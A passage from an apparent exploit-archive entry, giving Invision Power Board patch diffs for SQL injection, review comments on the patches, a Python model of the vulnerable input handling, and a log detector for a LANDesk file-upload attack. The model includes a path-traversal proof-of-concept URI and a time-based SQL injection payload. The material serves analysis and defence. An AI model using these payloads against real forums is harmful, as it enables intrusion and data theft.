Needs to be BEFORE caches and member are set up */\r\n \r\n self::_fUrlInit();\r\n+ IPSLib::cleanGlobals( $_GET );\r\n+ IPSLib::cleanGlobals( $_REQUEST );\r\n+ IPSLib::cleanGlobals( self::$request );\r\n \r\n self::_manageIncomingURLs();\r\n \r\n \r\nIPB 2.3.6 patch:\r\n \r\n \r\ndiff -Nprub ipb236/sources/lib/func_mod.php ipb236-patched/sources/lib/ func_mod.php\r\n \r\n--- ipb236/sources/lib/func_mod.php 2009-11-29 01:10:13.000000000 +0000\r\n \r\n+++ ipb236-patched/sources/lib/func_mod.php 2009-11-29 01:19:23.000000000 +0000\r\n \r\n@@ -1219,18 +1219,18 @@ class func_mod\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < $date_exp\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id=$starter_id\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < $post_min\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\n \r\nApply by going to your forum's directory and running the command:\r\npatch -p1 < path_to_the_patch\r\n \r\nIX. REFERENCES\r\n-------------------------\r\nhttp://www.invisionpower.com/products/board/\r\n\r\n\r\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/10083"}]}}
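Review bot: in the 3.0.4 moderate.php hunk (@@ -1829,18 +1829,18 @@) only the three numeric branches are fixed, while the unchanged `if ($topic_state != 'all')` branch that follows still interpolates `state='{$topic_state}'` from a raw string, so sqlPruneCreate keeps depending on parseCleanValue having turned quotes into `&#39;` before the call, and the advisory says this library function is reached from two call sites. Cast the parameters once at the top of the function rather than at each use, e.g. `$starter_id = intval($starter_id);`, `$post_min = intval($post_min);`, `$date_exp = intval($date_exp);`, and pass `$topic_state` through the DB layer's escaping so the function is safe whichever caller reaches it. Note also that the `if ( intval(...) )` guards now silently reduce a tampered value such as `1 OR sleep(5)` to `1` instead of rejecting it, which is safe for the query but hides the attempt from any logging.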
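Review bot: in the ipsRegistry.php hunk (@@ -479,6 +479,9 @@) re-running cleanGlobals on `$_GET`, `$_REQUEST` and `self::$request` after `self::_fUrlInit();` closes the reported path, but it is still a blacklist applied at the input layer while the sink at line 174 of ipsController.php (`require_once( $filepath . $section . '.php' )`) accepts any string, and the `$_urlBits[ $k ]` copy written on line 1329 of the listing is not cleaned by this hunk. Add a positive check in getCommand before the `file_exists`/`require_once`, for example refuse the request (or fall back to the module's default section) when `preg_match( '/^[A-Za-z0-9_]+$/', $section )` fails, so that any future input path that skips cleanGlobals cannot reach the include. Not re-cleaning `$_POST` here is fine, since `_fUrlInit()` writes only `$_GET`, `$_REQUEST` and `ipsRegistry::$request`.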
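Review bot: the func_mod.php hunk for 2.3.6 (@@ -1219,18 +1219,18 @@) is the same three-line change as the 3.0.4 hunk and carries the same gap: the trailing context line `if ($topic_state != 'all')` shows the quoted `state` clause still follows unchanged, and the numeric values are still only coerced at the point of concatenation rather than once at the top of the function. Since the advisory states the 2.x path is reachable only with moderator privileges and the injection is blind and WHERE-only, the hunk is adequate as the stated temporary fix, but the `$topic_state` interpolation should get DB-layer escaping in the same pass.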
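The two IPB issues above share one input pipeline, so here is a single Python model of it, added by the editor and not taken from IPB or from the advisory: clean_globals and parse_clean_value follow the section III listings (replacement order included), build_request reproduces the secondary-query-string bug of section IV, and sql_prune_create with prune_where reproduces the intval() guard of section V with the advisory's patch switchable. MODULES_DIR, the include_path_hardened resolver, and the POC_URI/SQLI_STARTER inputs are the editor's assumptions and constructed values; php_intval models PHP's leading-digit parsing only, not every PHP version's numeric-string rules.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed inputs (the editor's, not the advisory's targets) and an assumed layout.
POC_URI = "/forum/index.php?app=core&module=global&section=register&any=?section=../../../../tmp/inc"
SQLI_STARTER = "1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20"
MODULES_DIR = "/var/www/forum/admin/applications/core/modules_public/global/"  # assumed path


def clean_globals(value: str) -> str:
    """IPSLib::cleanGlobals on one scalar: drop NUL variants, entity-encode '../'."""
    for nul in ("\x00", "%00"):
        value = value.replace(nul, "")
    return value.replace("../", "&#46;&#46;/")


def parse_clean_value(value: str) -> str:
    """IPSText::parseCleanValue in the listing's order. It never touches '.', '/', '('
    or '=', so it blocks quoted injection and XSS but not traversal or a numeric injection."""
    if value == "":
        return ""
    value = value.replace("&#032;", " ")
    value = value.replace("\r\n", "\n").replace("\n\r", "\n").replace("\r", "\n")
    value = value.replace("&", "&amp;")
    value = value.replace("<!--", "&#60;&#33;--").replace("-->", "--&#62;")
    value = re.sub(r"<script", "&#60;script", value, flags=re.IGNORECASE)
    value = value.replace(">", "&gt;").replace("<", "&lt;").replace('"', "&quot;")
    value = value.replace("\n", "<br />")
    return value.replace("$", "&#036;").replace("!", "&#33;").replace("'", "&#39;")


def build_request(request_uri: str) -> dict:
    """ipsRegistry::init() then _fUrlInit(). PHP URL-decodes the real query string and
    IPB runs it through cleanGlobals + parseCleanValue; when REQUEST_URI holds more
    than one '?', the text after the LAST one is parsed again and only passes
    parseCleanValue (no decoding, no cleanGlobals): the section IV bug."""
    request = {}
    query = request_uri.split("?", 1)[1] if "?" in request_uri else ""
    for param in query.split("&"):
        key, _, val = param.partition("=")
        if key:
            request[key] = parse_clean_value(clean_globals(unquote(val)))
    if request_uri.count("?") > 1:
        for param in request_uri[request_uri.rfind("?") + 1:].split("&"):
            key, _, val = param.partition("=")
            if key:
                request[key] = parse_clean_value(val)  # overwrites the cleaned copy
    return request


def include_path(section: str) -> str:
    """ipsController::getCommand line 174: require_once( $filepath . $section . '.php' )."""
    return MODULES_DIR + section + ".php"


def include_path_hardened(section: str) -> str:
    """Positive check at the sink (editor's suggestion, not IPB's fix): identifier-like
    names only, and the normalised path must stay under MODULES_DIR."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", section):
        raise ValueError(f"rejected section name {section!r}")
    path = posixpath.normpath(MODULES_DIR + section + ".php")
    if not path.startswith(MODULES_DIR):
        raise ValueError("include path escapes the modules directory")
    return path


def php_intval(value) -> int:
    """PHP intval() on a string: optional whitespace and sign, then digits; the rest is
    ignored, so intval('1 OR sleep(5)') == 1. (PHP >= 7.1 also accepts exponent forms
    such as '1e3'; not modelled here.)"""
    match = re.match(r"\s*([+-]?\d+)", str(value))
    return int(match.group(1)) if match else 0


def sql_prune_create(forum_id, starter_id="", topic_state="", post_min="",
                     date_exp="", ignore_pin="", patched=False) -> str:
    """moderatorLibrary::sqlPruneCreate (section V). The guards use intval() but the raw
    string is concatenated; patched=True concatenates intval() as the advisory's diff does."""
    emit = (lambda v: str(php_intval(v))) if patched else str
    sql = f"forum_id={php_intval(forum_id)}"
    if php_intval(date_exp):
        sql += f" AND last_post < {emit(date_exp)}"
    if php_intval(starter_id):
        sql += f" AND starter_id={emit(starter_id)}"
    if php_intval(post_min):
        sql += f" AND posts < {emit(post_min)}"
    if topic_state != "all" and topic_state:
        sql += f" AND state='{topic_state}'"
    if str(ignore_pin) not in ("", "0"):  # PHP's loose != "" treats 0 as empty
        sql += " AND pinned=0"
    return sql


def prune_where(starter: str, state: str, patched=False) -> str:
    """_pruneMove(): $starter and $state are trim()med request values, never intval()'d;
    the other arguments are cast by the caller, so they are passed here as integers."""
    starter = parse_clean_value(clean_globals(unquote(starter))).strip()
    state = parse_clean_value(clean_globals(unquote(state))).strip()
    return sql_prune_create(1, starter, state, post_min=0, date_exp=0,
                            ignore_pin=1, patched=patched)
```

Running `build_request(POC_URI)["section"]` gives the raw `../../../../tmp/inc`, whereas the same value sent in the primary query string comes back entity-encoded; `prune_where(SQLI_STARTER, "open")` reproduces the WHERE clause quoted in the advisory, and the same call with `patched=True` collapses the payload to `starter_id=1`.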
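Detection for the upload-then-execute sequence the LANDesk ThinkManagement module earlier on this page performs, written here as an added Python example (it is not part of the Metasploit module or of LANDesk): a POST to the anonymous ServerSetup.asmx endpoint followed within a short window by a 200 for an .asp under /ldlogon/ from the same client, with a POST to VulCore.asmx from that client recorded as the module's cleanup step. The log excerpt is constructed in IIS W3C format and its field order is an assumption read from the #Fields header; the URI stems assume the module's default PATH of '/', so a deployment under a prefix would need them matched as suffixes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C-style excerpt (not real traffic); column names come from #Fields.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2012-02-15 10:01:02 10.0.0.5 GET /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx WSDL 80 10.0.0.9 200
2012-02-15 10:02:10 10.0.0.5 POST /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx - 80 203.0.113.7 200
2012-02-15 10:02:11 10.0.0.5 GET /ldlogon/kqzpwv.asp - 80 203.0.113.7 200
2012-02-15 10:02:12 10.0.0.5 POST /WSVulnerabilityCore/VulCore.asmx - 80 203.0.113.7 200
2012-02-15 10:30:00 10.0.0.5 GET /ldlogon/ldappl3.ldz - 80 10.0.0.12 200
2012-02-15 11:00:00 10.0.0.5 POST /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx - 80 10.0.0.12 500
"""

# Endpoints taken from the module listing; the ASP lands under ldlogon/<random>.asp.
UPLOAD_ENDPOINT = "/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
CLEANUP_ENDPOINT = "/WSVulnerabilityCore/VulCore.asmx"
LDLOGON_ASP = re.compile(r"^/ldlogon/[^/]+\.asp$", re.IGNORECASE)


def parse_w3c(text: str):
    """Yield one dict per record, using the #Fields header for the column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            rec["sc-status"] = int(rec["sc-status"])
            yield rec


def _is(rec: dict, method: str, stem: str) -> bool:
    return rec["cs-method"] == method and rec["cs-uri-stem"].lower() == stem.lower()


def detect_upload_chain(text: str, window: timedelta = timedelta(minutes=5)) -> list:
    """One alert per client that POSTs to the anonymous ServerSetup.asmx endpoint and,
    within `window`, is served (200) an .asp under /ldlogon/. A POST to VulCore.asmx
    from the same client inside the window is flagged as the module's cleanup step."""
    by_client = defaultdict(list)
    for rec in parse_w3c(text):
        by_client[rec["c-ip"]].append(rec)
    alerts = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        for i, upload in enumerate(recs):
            if not _is(upload, "POST", UPLOAD_ENDPOINT):
                continue
            later = [r for r in recs[i + 1:] if r["ts"] - upload["ts"] <= window]
            executed = next((r for r in later if r["cs-method"] == "GET"
                             and LDLOGON_ASP.match(r["cs-uri-stem"])
                             and r["sc-status"] == 200), None)
            if executed:
                alerts.append({
                    "client": client,
                    "uploaded_at": upload["ts"].isoformat(),
                    "executed": executed["cs-uri-stem"],
                    "cleanup_seen": any(_is(r, "POST", CLEANUP_ENDPOINT) for r in later),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_upload_chain(SAMPLE_LOG):
        print(alert)
```

On the sample, the internal WSDL fetch and the failed (500) POST produce nothing; only the 203.0.113.7 sequence is reported, with cleanup_seen set because the VulCore.asmx call followed. A single 200 for an unexpected .asp under /ldlogon/ is worth a lower-severity rule on its own, since the module deletes the file afterwards and the IIS log may be the only trace left.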